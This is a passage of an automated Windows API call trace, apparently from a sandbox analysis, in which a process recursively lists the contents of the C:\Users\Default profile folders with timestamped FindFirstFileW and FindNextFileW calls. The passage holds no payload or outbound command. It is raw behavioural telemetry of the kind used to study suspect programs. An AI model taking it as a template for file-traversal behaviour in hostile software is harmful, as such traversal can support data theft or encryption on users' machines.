nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.401] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.402] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.402] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.402] lstrlenW (lpString="desktop.ini") returned 11 [0068.402] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.402] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.402] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0068.402] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.402] lstrlenW (lpString="Favorites") returned 9 [0068.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.455] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.455] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.455] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.455] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.455] lstrlenW (lpString="desktop.ini") returned 11 [0068.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x5bee70 | out: lpFindFileData=0x5bee70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.456] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5bee70 | out: lpFindFileData=0x5bee70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.456] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.456] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5bee70 | out: lpFindFileData=0x5bee70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.456] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.456] lstrlenW (lpString="desktop.ini") returned 11 [0068.456] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.456] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bee70 | out: hHeap=0x580000) returned 1 [0068.456] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0068.456] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.456] lstrlenW (lpString="Microsoft Websites") returned 18 [0068.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x5bee70 | out: lpFindFileData=0x5bee70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.518] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5bee70 | out: lpFindFileData=0x5bee70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.518] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.518] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5bee70 | out: lpFindFileData=0x5bee70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0068.518] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.518] lstrlenW (lpString="IE Add-on site.url") returned 18 [0068.518] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.519] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bee70 | out: hHeap=0x580000) returned 1 [0068.519] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0068.519] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.519] lstrlenW (lpString="MSN Websites") returned 12 [0068.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x5c77b0 | out: lpFindFileData=0x5c77b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.525] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5c77b0 | out: lpFindFileData=0x5c77b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0068.525] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.525] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5c77b0 | out: lpFindFileData=0x5c77b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0068.525] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.525] lstrlenW (lpString="MSN Autos.url") returned 13 [0068.525] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.547] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.547] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0068.547] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.547] lstrlenW (lpString="Windows Live") returned 12 [0068.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x5c77b0 | out: lpFindFileData=0x5c77b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.591] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5c77b0 | out: lpFindFileData=0x5c77b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.591] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.591] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5c77b0 | out: lpFindFileData=0x5c77b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0068.591] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.591] lstrlenW (lpString="Get Windows Live.url") returned 20 [0068.592] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.592] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.592] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0068.592] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.593] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.593] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Links", cAlternateFileName="")) returned 1 [0068.593] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.593] lstrlenW (lpString="Links") returned 5 [0068.593] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.632] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.632] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.632] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.632] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.632] lstrlenW (lpString="desktop.ini") returned 11 [0068.633] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.633] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.633] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0068.633] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.633] lstrlenW (lpString="Local Settings") returned 14 [0068.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5bef30, ftCreationTime.dwLowDateTime=0x5b9728, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0068.634] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.634] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Music", cAlternateFileName="")) returned 1 [0068.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.634] lstrlenW (lpString="Music") returned 5 [0068.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.634] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.634] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.634] lstrlenW (lpString="desktop.ini") returned 11 [0068.634] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.634] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.634] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0068.634] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.634] lstrlenW (lpString="My Documents") returned 12 [0068.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5bef30, ftCreationTime.dwLowDateTime=0x5b9728, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0068.635] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.635] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="NetHood", cAlternateFileName="")) returned 1 [0068.635] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.635] lstrlenW (lpString="NetHood") returned 7 [0068.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5bef30, ftCreationTime.dwLowDateTime=0x5b9728, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0068.635] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.635] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0068.635] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.635] lstrlenW (lpString="NTUSER.DAT") returned 10 [0068.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 